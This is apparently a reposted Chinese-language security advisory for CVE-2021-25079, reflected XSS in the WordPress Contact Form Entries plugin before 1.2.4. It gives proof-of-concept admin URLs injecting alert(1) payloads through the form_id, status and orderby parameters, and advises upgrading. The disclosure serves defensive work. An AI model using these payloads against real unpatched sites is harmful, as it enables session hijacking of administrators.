版本: < 1.2.4
CVE : CVE-2021-25079
参考:
https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/
vxcf_leads 管理员页面的几个参数容易受到反射跨站点脚本漏洞的攻击。
GET /wp-admin/ admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+
返回数据库中已保存条目的列表。 form_id 值反映在 < form_id 参数未经过过滤,因此可以注入任意值。
http://example.com/wp-admin /admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+
允许在输入表单中注入 onmouseover
<input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>
通过在 click 元素内移动鼠标,漏洞被触发。即使该漏洞似乎需要用户在输入元素上移动鼠标,也可以通过注入一个“样式”部分来改进攻击,该部分可以扩展具有大宽度和高度的输入元素。这样,当用户点击链接时,就会执行javascript代码。 status 参数容易受到最危险的 XSS 攻击:只需发送以下请求
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date
将执行 XSS 漏洞. order、orderby 和 search 参数也容易受到 XSS 攻击:
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt
解决方法: 将联系表条目升级到版本 1.2.4
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。